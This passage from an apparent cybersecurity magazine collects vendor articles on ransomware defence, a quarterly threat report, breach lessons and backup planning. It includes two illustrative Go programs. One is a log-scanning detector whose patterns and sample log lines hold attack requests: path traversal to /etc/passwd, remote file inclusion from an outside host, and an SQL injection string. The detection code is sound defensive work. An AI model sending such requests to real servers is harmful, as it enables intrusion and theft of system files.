rules are observed. Even smaller measures can protect companies and organizations from severe
consequences. Such measures can be comprehensive security software that detects unknown
vulnerabilities or so-called zero-day gaps and prevents their execution.
With a growing number of businesses allowing their employees to work from home, new security
challenges arise. Therefore, companies need to sensitize their staff to the issue of proper cyber-security.
This can include everything from a well-protected network to VPNs or data encryption solutions.
Furthermore, companies should offer regular training and conduct random tests to raise awareness of
ransomware and similar malware amongst employees.
If despite all security measures, a company still falls victim to a ransomware attack, it is advised to have
an emergency plan at hand. This way, those responsible in the company can act faster and keep the
damage caused by ransomware as low as possible. Companies can implement the following steps into
their data breach emergency plan:
1. Immediately disconnect or remove any potentially affected or suspicious devices from the
network.
2. Inspect the damage that has been caused.
3. Identify the ransomware to determine which relevant authorities or individuals need to be notified.
4. Inform all relevant authorities and affected persons.
How Can the Cloud and Encryption Help Against Ransomware Attacks?
Many companies have already shifted their work into the cloud to benefit from increased flexibility,
efficiency in team communication, and optimized workflows. Company data can be accessed at any time
and from any location. One cloud feature that comes in handy in case of a ransomware attack is
versioning. When your company data is encrypted by malicious software, you can simply switch back to
a version of your data before the attack, and you gain back control over your data. This way, the damage
done by the ransomware attack is reduced to a minimum.
However, by the time you find out about the attack, the attackers have probably already copied and
stolen your company data. This is where encryption comes in, as the second protection measure
against ransomware.
Every business possesses confidential information and data that should not be disclosed, such as
personal data of customers or trade secrets. Therefore, it is important to protect this information as best
as possible, for example through end-to-end encryption. When encrypted, the data contents are protected
from malicious software, since only worthless strings are transmitted to the attackers. Thus, without
interesting data, no worthwhile attack scenario arises, as the affected company cannot be blackmailed
into paying a ransom.
In the case of unencrypted data being involved in a data leak, there is no guarantee that the attacker will
not still publish sensitive data, regardless of whether the ransom has been paid. This would hit companies
particularly hard, as they not only suffer a huge financial loss but also must take responsibility for the lost
data.
In combination with the cloud, encryption solutions can offer even greater protection. In the event of an
attack, all securely encrypted files are protected and can be restored even if the attacker deletes the files.
However, regular backups and cloud-optimized encryption solutions, like Boxcryptor, are required to
ensure continuity. At the same time, it is important to choose an encryption solution with zero-knowledge,
so that only authorized people in your company will have access to sensitive company files.
An example: You decide in your company to store the data not only locally, but also with an automatic,
regular backup in the cloud storage of Microsoft and Dropbox. Additionally, you encrypt that data with
Boxcryptor before uploading to the cloud. If you now become a victim of a ransomware attack, you can
restore the affected data via your last backup in the Microsoft or Dropbox cloud. Moreover, you can be
sure that the attacker will not be able to do anything with the stolen data, as this data has been encrypted
with the key known only to you and is thus not visible to the attacker. You can rest easy and do not have
to pay a ransom.
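The example above, worked through in code as an added illustration (this is not Boxcryptor’s code or any product’s; it assumes a client-side AES-256-GCM scheme and an in-memory stand-in for a versioned cloud bucket): the file is encrypted with a key the cloud never sees, the uploaded ciphertext carries no trace of the plaintext, a ransomware overwrite of the latest version cannot be opened under the owner’s key, and the pre-attack version restores and decrypts locally. The file name and the secret are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// Encrypt seals plaintext with AES-256-GCM under a key that stays with the
// data owner; the random 12-byte nonce is prepended so Decrypt can find it.
func Encrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// Decrypt reverses Encrypt; GCM's tag makes a modified, truncated or foreign
// blob fail with an error instead of yielding garbage.
func Decrypt(key, blob []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, errors.New("blob too short to contain a nonce")
	}
	return gcm.Open(nil, blob[:gcm.NonceSize()], blob[gcm.NonceSize():], nil)
}

// VersionedStore stands in for a cloud bucket with file versioning: every
// upload is retained, so the copy from before an attack survives an overwrite.
type VersionedStore struct{ versions map[string][][]byte }

// Put stores a new version of name and returns its version index.
func (s *VersionedStore) Put(name string, blob []byte) int {
	s.versions[name] = append(s.versions[name], append([]byte(nil), blob...))
	return len(s.versions[name]) - 1
}

// Get returns one retained version of name, or nil if there is none.
func (s *VersionedStore) Get(name string, version int) []byte {
	if vs := s.versions[name]; version >= 0 && version < len(vs) {
		return vs[version]
	}
	return nil
}

// RunScenario walks through the article's example: encrypt before upload,
// ransomware overwrites the latest copy, the owner restores the previous one.
// It returns the recovered plaintext and whether the uploaded blob ever
// exposed the plaintext to the provider or to a thief (it must not).
func RunScenario(key, secret []byte) (recovered []byte, leaked bool, err error) {
	const name = "ledger.xlsx" // constructed file name
	store := &VersionedStore{versions: map[string][][]byte{}}
	blob, err := Encrypt(key, secret)
	if err != nil {
		return nil, false, err
	}
	leaked = bytes.Contains(blob, secret)
	good := store.Put(name, blob)
	// Ransomware re-encrypts the local file and the sync client uploads it.
	junk := make([]byte, len(blob))
	if _, err := rand.Read(junk); err != nil {
		return nil, leaked, err
	}
	latest := store.Get(name, store.Put(name, junk))
	if _, err := Decrypt(key, latest); err == nil {
		return nil, leaked, errors.New("ransomware output unexpectedly decrypted")
	}
	// The latest copy is useless, so restore the pre-attack version and decrypt it locally.
	recovered, err = Decrypt(key, store.Get(name, good))
	return recovered, leaked, err
}

func main() {
	key := make([]byte, 32) // in practice derived from a passphrase with a KDF
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	got, leaked, err := RunScenario(key, []byte("Q1 revenue: confidential"))
	fmt.Printf("recovered=%q leaked=%v err=%v\n", got, leaked, err)
}
```

In a real deployment the key would be derived from a passphrase with a KDF or held in a key manager, and versioning would be the storage provider’s own feature rather than the map used here. The authentication check in Decrypt is what makes the restore trustworthy: a blob the attacker altered fails to open instead of silently yielding garbage, and the same property is what leaves a thief holding the ciphertext with nothing to publish.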
Conclusion
Companies all over the world are falling victim to ransomware attacks. However, it is important to ask
how well or poorly prepared an organization is in the event of an attack. Fortunately, there are
preventative measures that can be taken:
- Make employees aware of spam and phishing emails.
- Back up your data regularly.
- Protect sensitive files with zero-knowledge encryption solutions.
If you implement these three tips, your business will already be in a better position than most other
companies worldwide. Use this knowledge to your advantage and start to encrypt your files today.
About the Author
Robert Freudenreich is the CTO of Secomba GmbH | Boxcryptor. In
2011, the computer scientist founded the company together with
Andrea Pfundmeier, CEO at Boxcryptor. The Germany-based
company's software has over 500,000 satisfied customers worldwide
and is used by both private users and numerous companies to protect
data stored in the cloud. In their first year, Freudenreich and
Pfundmeier received the EXIST Founders’ Scholarship from the
German Federal Ministry for Economic Affairs and Energy. In 2013,
they won the highly endowed “Wirtschaftswoche founder competition”
and in 2014 the German Founder’s Prize.
Robert can be reached online at Twitter (@robfreudenreich) and at our
company website https://www.boxcryptor.com/de/
Endpoint Malware and Ransomware Volume Already
Exceeded 2020 Totals by the End of Q3 2021
By Corey Nachreiner, CSO, WatchGuard Technologies
The cybersecurity landscape of today is constantly evolving and threat actors are not far behind as they
target users with increasingly sophisticated and complex attacks. To help both professionals and casual
Internet users alike better understand the current state of these threats, WatchGuard wanted to share
our quarterly Internet Security Report (ISR), which outlines the latest malware and network attacks in Q3
2021.
The most shocking statistic from this recent report revealed that the volume of endpoint malware and
ransomware exceeded all of 2020 by the end of Q3 2021. The research (done by the Threat Lab) also
found that a significant percentage of malware continues to arrive over encrypted connections, as we
saw in previous quarters, and much more. While most people continue to work in a hybrid or mobile
workforce model, it’s crucial that organizations move beyond a traditional approach to cybersecurity and
leverage layered-security approaches and zero-trust. So, let’s take a look at some of the top insights from
the Q3 ISR:
• Nearly half of zero-day malware is now delivered via encrypted connections – While the
total amount of zero-day malware increased by a modest 3% to 67.2% in Q3, the percentage of
malware that arrived via Transport Layer Security (TLS) jumped from 31.6% to 47%. A lower
percentage of encrypted zero-days are considered advanced, but it is still concerning given that
WatchGuard’s data shows that many organizations are not decrypting these connections and
therefore have poor visibility into the amount of malware hitting their networks.
• As users upgrade to more recent versions of Microsoft Windows and Office, attackers are
focusing on newer vulnerabilities – While unpatched vulnerabilities in older software continue
to provide a rich hunting ground for attackers, they are also looking to exploit weaknesses in the
latest versions of Microsoft’s widely used products. In Q3, CVE-2018-0802 – which exploits a
vulnerability in the Equation Editor in Microsoft Office – cracked WatchGuard’s top 10 gateway
antivirus malware by volume list, hitting number 6, after showing up in the most-widespread
malware list in the previous quarter. In addition, two Windows code injectors (Win32/Heim.D and
Win32/Heri) came in at number 1 and 6 on the most detected list respectively.
• Attackers disproportionately targeted the Americas – The overwhelming majority of network
attacks targeted the Americas in Q3 (64.5%) compared to Europe (15.5%) and APAC (20%).
• Overall network attack detections resumed a more normal trajectory but still pose
significant risks – After consecutive quarters of more than 20% growth, WatchGuard’s Intrusion
Prevention Service (IPS) detected roughly 4.1 million unique network exploits in Q3. The drop of
21% brought volumes down to Q1 levels, which were still high compared to the previous year.
The shift doesn’t necessarily mean adversaries are letting up as they are possibly shifting their
focus towards more targeted attacks.
• The top 10 network attack signatures account for the vast majority of attacks – Of the
4,095,320 hits detected by IPS in Q3, 81% were attributed to the top 10 signatures. In fact, there
was just one new signature in the top 10 in Q3, ‘WEB Remote File Inclusion /etc/passwd’
(1054837), which targets older, but still widely used Microsoft Internet Information Services (IIS)
web servers. One signature (1059160), a SQL injection, has continued to maintain the position it
has held atop the list since Q2, 2019.
• Scripting attacks on endpoints continue at record pace – By the end of Q3, WatchGuard’s
AD360 threat intelligence and WatchGuard Endpoint Protection, Detection and Response
(EPDR) had already seen 10% more attack scripts than in all of 2020 (which, in turn, saw a 666%
increase over the prior year). As hybrid workforces start to look like the rule rather than the
exception, a strong perimeter is no longer enough to stop threats. While there are several ways
for cybercriminals to attack endpoints – from application exploits to script-based living-off-the-land
attacks – even those with limited skills can often fully execute a malware payload with scripting
tools like PowerSploit, PowerWare and Cobalt Strike, while evading basic endpoint detection.
• Even normally safe domains can be compromised – A protocol flaw in Microsoft’s Exchange
Server Autodiscover system allowed attackers to collect domain credentials and compromise
several normally trustworthy domains. Overall, in Q3 WatchGuard Fireboxes blocked 5.6 million
malicious domains, including several new malware domains that attempt to install software for
cryptomining, key loggers and remote access trojans (RATs), as well as phishing domains
masquerading as SharePoint sites to harvest Office365 login credentials. While down 23% from
the previous quarter, the number of blocked domains is still several times higher than the level
seen in Q4 2020 (1.3 million). This highlights the critical need for organizations to focus on keeping
servers, databases, websites, and systems updated with the latest patches to limit vulnerabilities
for attackers to exploit.
• Ransomware, Ransomware, Ransomware – After a steep decline in 2020, ransomware attacks
reached 105% of 2020 volume by the end of September (as WatchGuard predicted at the end of
the prior quarter) and are on pace to reach 150% once the full year of 2021 data is analyzed.
Ransomware-as-a-service operations such as REvil and GandCrab continue to lower the bar for
criminals with little or no coding skills, providing the infrastructure and the malware payloads to
carry out attacks globally in return for a percentage of the ransom.
• The quarter’s top security incident, Kaseya, was another demonstration of the ongoing
threat of digital supply chain attacks – Just before the start of the long 4th of July holiday
weekend in the US, dozens of organizations began reporting ransomware attacks against their
endpoints. WatchGuard’s incident analysis described how attackers working with the REvil
ransomware-as-a-service (RaaS) operation had exploited three zero-day vulnerabilities (including
CVE-2021-30116 and CVE-2021-30118) in Kaseya VSA Remote Monitoring and Management
(RMM) software to deliver ransomware to some 1,500 organizations and potentially millions of
endpoints. While the FBI eventually compromised REvil’s servers and obtained the decryption
key a few months later, the attack provided yet another stark reminder of the need for
organizations to proactively take steps like adopting zero-trust, employing the principle of least
privilege for vendor access and ensuring systems are patched and up to date to minimize the
impact of supply chain attacks.
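To show what the two long-lived IPS signatures named above look like from the defender’s side, here is an added example (not WatchGuard’s code or its signatures) that scans web-server access-log lines in Combined Log Format for the request patterns behind them: file-inclusion attempts aimed at /etc/passwd, path traversal, remote file inclusion and a simple SQL injection. The rule names, the log lines and the IP addresses are all constructed for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one flagged request: its 1-based line number and the rules it tripped.
type Finding struct {
	Line  int
	Rules []string
}

// requestRe pulls the request target out of a Combined Log Format line.
var requestRe = regexp.MustCompile(`"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) ([^ "]+) HTTP/`)

// rules are simple patterns over the decoded, lower-cased target. The names
// are descriptive labels, not the vendor signature IDs quoted in the article.
var rules = []struct {
	name string
	re   *regexp.Regexp
}{
	{"file-inclusion-etc-passwd", regexp.MustCompile(`/etc/passwd`)},
	{"path-traversal", regexp.MustCompile(`(?:\.\./){2,}`)},
	{"remote-file-inclusion", regexp.MustCompile(`=\s*(?:https?|ftp)://`)},
	{"sql-injection", regexp.MustCompile(`'\s*or\s+'?\d+'?\s*=\s*'?\d+|union\s+(?:all\s+)?select|;\s*drop\s+table`)},
}

// normalize URL-decodes the target twice (to catch double encoding) and
// lower-cases it, so that "%2e%2e/" and "../" meet the same rules.
func normalize(target string) string {
	s := target
	for i := 0; i < 2; i++ {
		d, err := url.QueryUnescape(s)
		if err != nil {
			break
		}
		s = d
	}
	return strings.ToLower(s)
}

// Scan runs every rule over every line and returns the hits in log order.
func Scan(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		m := requestRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		target := normalize(m[1])
		var hit []string
		for _, r := range rules {
			if r.re.MatchString(target) {
				hit = append(hit, r.name)
			}
		}
		if len(hit) > 0 {
			out = append(out, Finding{Line: i + 1, Rules: hit})
		}
	}
	return out
}

// sampleLog is constructed; the addresses come from the documentation ranges.
var sampleLog = []string{
	`203.0.113.7 - - [10/Mar/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
	`203.0.113.7 - - [10/Mar/2022:10:01:05 +0000] "GET /page.php?file=../../../../etc/passwd HTTP/1.1" 404 120 "-" "curl/7.79"`,
	`198.51.100.2 - - [10/Mar/2022:10:02:11 +0000] "GET /include.php?page=http://203.0.113.9/x.txt HTTP/1.1" 500 90 "-" "-"`,
	`198.51.100.2 - - [10/Mar/2022:10:03:30 +0000] "GET /login.php?user=admin%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 300 "-" "-"`,
	`192.0.2.5 - - [10/Mar/2022:10:04:00 +0000] "POST /api/orders HTTP/1.1" 201 40 "-" "app/2.1"`,
}

func main() {
	for _, f := range Scan(sampleLog) {
		fmt.Printf("line %d: %s\n", f.Line, strings.Join(f.Rules, ", "))
	}
}
```

Decoding the target twice before matching is what catches double-encoded requests; it also means a legitimate literal `%25` sequence gets decoded, so in production the rule set is tuned against the site’s own traffic to keep false positives down. The wider point is the one the report makes about visibility: these signatures have topped the list for years because the requests are easy to recognize once a device in the path actually inspects them.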
In Q3, malware per device skyrocketed and was up for the first time since the pandemic began. Looking
at 2021, it’s clear cybersecurity continues to challenge users. It’s critical that organizations think about the
long-term ups and downs as well as focus on persistent, concerning trends factoring into their security
posture. A strong cybersecurity strategy includes endpoint protection, multi-factor authentication and
secure Wi-Fi – all important components in a layered approach to security. When implemented properly,
users can drastically mitigate outsider threats.
About the Author
Corey Nachreiner is the CSO of WatchGuard Technologies. A front-line
cybersecurity expert for nearly two decades, Corey regularly contributes
to security publications and speaks internationally at leading industry
trade shows like RSA. He has written thousands of security alerts and
educational articles and is the primary contributor to the Secplicity
Community, which provides daily videos and content on the latest security
threats, news and best practices. A Certified Information Systems
Security Professional (CISSP), Corey enjoys "modding" any technical
gizmo he can get his hands on and considers himself a hacker in the old
sense of the word. Corey can be reached at @SecAdept on Twitter or via
https://www.watchguard.com.
Don’t Become a Horrible Headline: Some Tips on
Redesigning Your Threat Posture for The 2022 Threat
Landscape
By Omar Zarabi, Founder and CEO, Port53 Technologies
As in previous years, the DefCon of the cybersecurity industry is best illustrated by the headlines – each
a cautionary tale. The past two years were witness to a virtual House of Horrors that has propelled
cybersecurity to the top of corporate agendas. The 2020 supply-chain attack on SolarWinds' network
monitoring application Orion affected thousands of the company's customers around the world, including
several government agencies here in the US.
And the list goes on. March 2021: Verkada, a Silicon Valley start-up that provides cloud-based CCTV
systems, was compromised through the simple hijacking of privileged credentials. Attackers were able to
browse the real-time footage of every Verkada customer, including health clinics, psychiatric treatment
centers, and the premises of hybrid and electric car manufacturer Tesla. Also available for viewing:
Verkada's own offices.
Another example of stolen credentials was May's DarkSide ransomware attack on the Colonial Pipeline.
It led to panic-buying of gas by the public, and cost the operator $5 million, in a payout characterized by
The New York Times as a red flag to other threat actors who may see a lucrative pay day on the horizon.
Abnormal times
Even in normal years, this series of events – and others too numerous to mention – would have CISOs
scurrying to the drawing board to reimagine their threat postures. But we are not living in normal years.
In the midst of the dramatic contortions we were seeing in the threat landscape, nature threw a curveball
into the mix. The COVID-19 pandemic ravaged families, business communities, and economies around
the globe. Those enterprises that moved decisively migrated to the cloud almost overnight and instantly
expanded the attack surface.
The problems came from several different directions. First, employees working from home were using
unvetted personal devices that potentially contained a smorgasbord of vulnerabilities. These devices
used private and third-party networks to connect to the cloud-based environments required for remote
work. And corporate data, sensitive or not, was crossing unknown boundaries on its journey between the
WFH employee and the corporate environment. Penetration testing became unreliable because the
architecture being probed was half in and half out of an organization’s jurisdiction.
Second, DevOps teams – desperately trying to transform massive chunks of their employers’ business
models to adapt to the new normal – were releasing new digital experiences at the speed of demand.
These releases could, depending on circumstances, contain any number of security holes picked up from
new PaaS environments.
Rethink your digital dogma
As has been said at many points throughout cybersecurity history, what we were doing two years ago no
longer works. Threat actors have proved themselves capable of using every trend, every market shift,
every consumer habit, and every employee error to their advantage. Responses from organizations have
not been as swift. While cybersecurity professionals can never quite recall a “quiet past”, the “stormy
present” of 2022 requires a rethink of our digital dogmas if we are to ensure that employees can stay
safe but remain productive.
The starting point: know yourself. Line of business will always have a handle on financial plans,
operations, market conditions, and a range of other touchpoints. For IT and security teams to be
successful, they must compile a comprehensive asset inventory – from the machines in the office to the
devices in employees’ homes, from the tools on laptops to the inner workings of containerized apps in
the cloud.
Next comes triage. Identifying vulnerabilities is trivial next to the task of managing action. Some
vulnerabilities will be common but may not represent great damage if they were to be exploited. Others
may be rare but represent considerable business risk. The general rule of thumb is that if a vulnerability
can cause significant damage and is relatively easy to exploit by an attacker, it should be high on the
patching list. Anything that is high-risk and not readily addressable should be on a watch list.
Free to innovate
All of this, from the compilation of the asset inventory to the patching actions, should be automated where
possible. Several tools today are capable of automatic asset discovery and policy-based patching.
Overworked CISOs and their embattled teams represent the most overlooked security issue in the
post-pandemic era. By empowering professionals with the tools needed to automate the mundane, we free
them to become more effective threat hunters.
Once the basics are in place, organizations will be better placed to meet regulation and compliance
obligations. Policies alone will not allow you to prepare the reports required by auditors. And good
intentions will not satisfy the strict requirements of standards such as PCI-DSS. The good news is cloud-service
providers and other vendors are beginning to provide controls such as MFA and DNS security,
and are even offering training sessions for end users to prepare them for the hybrid-work future.
But chasing the regulators in a constantly reactive mode makes for poor security strategy. There is no
substitute for gaining a deep and broad understanding of your organization’s environment and selecting
the visualization and automation tools that best fit your circumstances, your architecture, and your
business goals. Getting the basics in place – asset inventory, vulnerability management, and user
awareness – will give you a strong foundation to secure your digital estate.
What next?
Once you have mastered your environment, you can turn your attention to some of the latest policies and
tools that are being deployed against cybercriminals. Many of the headline-grabbing incidents that we
have seen would not have occurred but for a lapse in the management of privileged credentials.
SolarWinds’ Orion, for example, uses privileged access to connect to other systems, which is how
attackers were able to compromise so many other organizations. Privileged access management (PAM)
is an emerging technique that allows CISOs and their teams to stipulate how accounts connect to
environments, using policies such as session monitoring, password rotation, least privilege, just-in-time
provisioning, and the elimination of shared accounts to keep estates safe while avoiding hits on employee
productivity.
Other practices include Zero Trust, which has become something of a hot topic. Allowing everything in,
and assuming all processes to be suspect until they can prove themselves otherwise, is an approach that
shows how far removed we are from the recent past. Here, we not only assume we are going to be
attacked; we assume we already have been. It is a grim yet justifiable assumption that accurately reflects
the world in which we now live.
Do not dismay, however. The headlines of horror may imply an inevitability in becoming a cyber-victim,
but their postmortems also show a path to risk remediation. There are tools you can procure, policies you
can enact, and action you can take that will ensure that your organization’s name is not the next to be
splashed across media pages.
About the Author
Omar Zarabi, Founder and CEO of Port53 Technologies.
Growing up in a small, family-run organization, I saw firsthand the
challenges the ever-changing technological landscape presented to
resource-restrained IT teams. With a BA in Economics from UC Davis, I
started my cybersecurity career at OpenDNS, where I was responsible
for delivering the DNS security solution to small and mid-sized
businesses in the US and Asia. I worked with thousands of IT
professionals in the SMB space, and truly learned their biggest pain
points, especially as it pertained to cloud adoption and cybersecurity -
two rather new and fluid trends in the SMB IT space.
In September of 2016, a little over a year after Cisco acquired OpenDNS,
I founded Port53 Technologies and am its CEO. Port53 is focused on
delivering enterprise-grade, cloud-delivered security solutions that are
easy to deploy, simple to manage and extremely effective, helping
customers not only get a big-data and predictive approach to security, but also a more integrated and
automated approach.
Omar Zarabi can be reached online at (Twitter, Facebook, LinkedIn)
Port53 at Port53 (Facebook, Twitter, LinkedIn, YouTube)
Have We Learned from Our Past Mistakes to Prevent
Future Cyberattacks?
By Marc Packler, President, CISO Advisory, Silent Quadrant
Gartner’s article, “The Top Cybersecurity Predictions for 2021-2022,” contains a quote from philosopher
George Santayana: “Those who cannot remember the past are condemned to repeat it.” Reading the
article made me ponder whether we, as cybersecurity practitioners, actually do learn enough from our
collective cybersecurity past to effectively protect present activities and to anticipate and meet future
threats.
Have we really learned from our past? Because protecting the cyber realm is such a broad duty, I would
have to say the answer is not yes or no, but it is yes and no. As a society, it appears we’ve embraced or
at least acknowledged the ease with which cyber criminals can manipulate enterprise systems, and we’ve
generally accepted the risks-to-consequences ratios in both our personal and professional lives. As a
result, many people take some measures to protect their personal home networks, but ultimately many
just don't think they will be the victim of a cyber attack. So, I would say that yes—most people have
learned that they need to protect themselves in some ways—but I would also say no to whether they
generally do enough. Similarly, the overwhelming majority of corporations have run risk analyses
regarding the use (or not) of various cybersecurity measures against their cost, and most have chosen
to implement at least some protective measures. So, yes, the corporate world has learned that not taking
measures to safeguard their networks would likely negatively impact their bottom lines at some point;
however, I would again say no to whether they generally do enough or to whether they’re generally using
the appropriate tools.
Also, why do we still need to tell a story about cybersecurity to change corporate culture and get serious
funding for security? Just walk around your organization, and everyone is on the network. Without it, little
work gets done and productivity drops significantly. If this tool is so important, why do we not treat it as
such? If Gartner’s data is accurate, lessons are coming slowly to many corporations:
• By 2025, ONLY 40% of boards of directors will have a dedicated cybersecurity committee
• By 2025, ONLY 70% of CEOs will mandate a culture of organizational resilience to combat threats
Another lesson still being taught: Do most corporations know they should be enforcing updates for known
security vulnerabilities that have been documented and announced by respective cyber communities to
keep us all safe? The answer is yes, but do most of them do enough or do it effectively? That answer is
no. If they did, consistently updating computers and keeping them current with the latest patches and security
fixes across the enterprise would stop 99% of vulnerabilities exploited to date.
Inconsistent system updates greatly expand cyber vulnerabilities and risks. If this is known and
understood, then why is it seemingly so difficult to succeed at attaining effective cybersecurity? It’s
because many companies don’t effectively cultivate three critical components of their cybersecurity
processes: 1) people, 2) culture and 3) technology. We must have people who follow the security
processes, a corporate cyber culture that supports its people and the processes, and the technology to
implement the processes, when necessary.
If we agree these are three critical components of effective cybersecurity processes, then we must
remember that people are trainable; the culture can be fixed with training and leadership from senior
management; and technology is constantly adapting with the use of artificial intelligence and machine
learning. Strengthening cybersecurity processes through people, culture, and technology costs
corporations valuable time and money, so it’s wise to use these three resources in the most practical and
beneficial ways possible. This often means that the latest and greatest technologies or programs aren’t
actually necessary to achieve effective cybersecurity.
As an example, look at zero trust. It is an architecture and not a technology, but the cybersecurity industry
very often wants customers to buy all new equipment to implement zero trust. This ends up helping the
bottom lines of the said cybersecurity companies, but are organizations any safer? That is often arguable,
but even newer tools have no better chance of succeeding than in the past unless the people using them
use them appropriately, born out of a culture that teaches and supports such use.
Aside from malicious actors themselves, if we believe people, or network users, are one of the biggest
threats in the cybersecurity realm, an immediate and cost-effective fix is to engender a culture of
cybersecurity professionalism in our everyday users. Train the users to not only prioritize necessary
updates on their systems but to follow other cyber hygiene measures regarding the use of email, the
internet, etc. How much training is sent to the employees? Is it completed, and is it a priority? Do the
employees understand the risks associated with not following proper cybersecurity processes? And is
the example of being a good cybersecurity steward exemplified from the top down—does it begin at
senior levels within the company? This is often the best way for culture to be impacted. A great example
of how senior levels can set the example can be taken from Netflix and the implementation of their leave
policy, which is to say they have no complex leave policy. As long as people complete their work and
don’t leave anyone else in the lurch, employees may take leave when and where they’d like. Employees
were initially disbelieving; however, when Reed Hastings, the chairman of Netflix, and the leadership staff
posted photos of their respective vacations, it changed the culture quickly because everyone could see
the boss was embracing the company’s approach to leave. This leave approach certainly wouldn’t work
in all organizations, but that is beside the point. It’s an example of how leaders in an organization can
positively influence their employees.
With predictions that threat actors will weaponize operational technology environments to cause human
casualties by 2025, and with the influx of over-the-air updatable programmable logic controllers and
continued malicious attacks on our SCADA networks, it’s more imperative than ever to learn from and
apply the cybersecurity lessons of the past. We are starting to see more broad negative effects of
breached or attacked systems on administrative networks today. Not only may companies have to stop
operations temporarily, but entire supply chains can be affected, which ultimately can affect the entire
country.
As IT and cybersecurity professionals, it's our duty and challenge to push industry executives to prioritize
cybersecurity as a high-interest item in the funding drills corporations exercise yearly. We must motivate
them to continue to bake cybersecurity in from the initial design and conception phases of budgeting
rather than tacking it on at the end of the process. To prevent cyber attacks such as those on Sony in 2014
or more recent examples such as Colonial Pipeline or JBS meat processing, we must use all the tools at
our disposal and more effectively apply the cybersecurity lessons of the past. This means not only
budgeting and applying funds to cybersecurity but also cultivating strong cybersecurity processes via
three main components: people, culture and technology. As Gartner pointed out, “99% of vulnerabilities
exploited will continue to be ones that teams knew existed.”
About the Author
(Source attribution: Silent Quadrant)
Marc is the President, CISO Advisory at Silent Quadrant. He is a widely
acknowledged subject matter expert and public speaker on matters of digital
protection and risk management.
Pioneering, innovative, highly accomplished, and decorated, Marc leverages an
immense and diverse skillset – derived over the course of his 25+ year career in
the United States Air Force – to positively impact digital security, digital
transformation, risk management, and strategic operations within organizations
across a vast array of industries.
Achieving the rank of Colonel, Marc’s rich military career included assignments as:
• Commander, Air Force Cyberspace Capabilities Center
• Commander, 375th Communications Group
• Director, Legislative Affairs, United States Cyber Command
• Commander, 2nd Communications Squadron
• Executive Officer, Office of Warfighting Integration
• Congressional Fellow for Senator Ben Nelson (Nebraska)
• Fellow, Center for a New American Security
With digital security at its core, Marc’s experience within both the public and private sectors spans
executive leadership, digital transformation, artificial intelligence, machine learning, robotics,
governance, and legislative affairs, among many other areas. Marc maintains the prestigious credentials,
CompTIA Advanced Security Practitioner (CASP+), Certified Information Systems Security Professional
(CISSP), Certified Information Security Manager (CISM), as well as Project Management Professional
(PMP), and Masters’ Degrees in both National Security Strategy and Management Information Systems.
Marc can be reached on the Silent Quadrant website, LinkedIn or email marc@silentquadrant.com.
How to strengthen cyber resilience with Unified BCDR
By Joe Noonan, General Manager, Unitrends and Spanning
Cybercrime and hybrid work environments prompted by the pandemic have significantly impacted the
way organizations protect and store their data. Data is living in multiple places, and backups now must
protect data centers, endpoints, multiple clouds and SaaS. More than ever, IT professionals need to
incorporate unified business continuity and disaster recovery (BCDR) plans into their cyber resilience
strategy to protect the organizations they serve.
Cyber resilience goes beyond firewalls and patching. It refers to how well an organization responds to
cyber threats and involves a strategy that accounts for planning, detecting, defending and responding in
case of an attack. It also includes a clear process for recovery and business continuity.
It is difficult for IT professionals to find time for cyber resilience planning when they’re juggling so many
other responsibilities. But not having a strategy in place can be disastrous for an organization.
Terms to Know
When it comes to BCDR, there are two terms that will guide your cyber resilience strategy – recovery
time objective (RTO) and recovery point objective (RPO). RTO is the amount of time it will take to have
the business back online. RPO refers to how much data an organization can afford to lose as it pertains
to time or amount of information. The RPO for a bank, for example, would be close to zero because as
soon as the system goes down, hundreds, even thousands of transactions can take place. A bank cannot
afford to lose this information and it would be difficult to recover if the IT environment is non-operational.
One way to think about RPO is that the more difficult it is to recover data, or to recreate it from scratch, the shorter
the RPO an organization will need to have. Once both RTO and RPO are established, it’s time to look for a
unified BCDR tool.
What to look for in a solution
Cybercriminals are becoming more cunning, driving the need for backup and recovery. A successful
backup can eliminate the impact of a cyberattack. Cybercriminals know this so they look for alternate
ways to disable, encrypt and delete those backups. An efficient unified BCDR solution is built on hardened
Linux – not Windows – so it is not as vulnerable. Another way to fend off cyber criminals is by storing
offsite data in an immutable format, which makes it untouchable and prevents attackers from making
changes to it.
Additionally, there are innovative backup appliances that can protect data wherever it lives. Today, there
are appliances that provide powerful data protection and fit in your pocket! These solutions are perfect
for small-office settings or even home offices since they do not require a server rack. They are extremely
quiet and come with built-in software that tests recoverability right on the box. This ensures data will be
available whenever needed.
AI saves time
Organizations should look for solutions that use artificial intelligence (AI) and machine-learning to identify
suspicious activity and alert administrators to possible ransomware before it spreads. AI has multiple
benefits, among them, allowing IT professionals to cut wasted time on false alerts and backup
remediation by up to 50%. An AI-powered assistant can think the way a technician does, prioritizing
issues in the most critical systems so your actual technicians can focus on what matters most.
Another thing to keep in mind when considering a unified BCDR solution is opting for tools that include
anti-phishing options to protect against credential compromise and account takeover attacks. People are
the first line of defense, and they may accidentally put an organization at risk if they lack security training.
An effective tool maximizes productivity
A unified BCDR solution should offer a single view of the entire data landscape, so technicians do not
have to move between multiple systems. This saves them time and decreases room for error. Another
way a BCDR tool can maximize productivity is through automation. Technicians can spend more than a
quarter of their day monitoring, managing and troubleshooting backups. Automated solutions proactively
fix common problems in the backup environment, therefore pulling double duty by saving technicians
time and securing the environment.
Don’t let compliance fall through the cracks
Some organizations operate in highly regulated industries such as government or healthcare, which
mandate how data must be secured. Regardless of the industry, most companies must adhere to
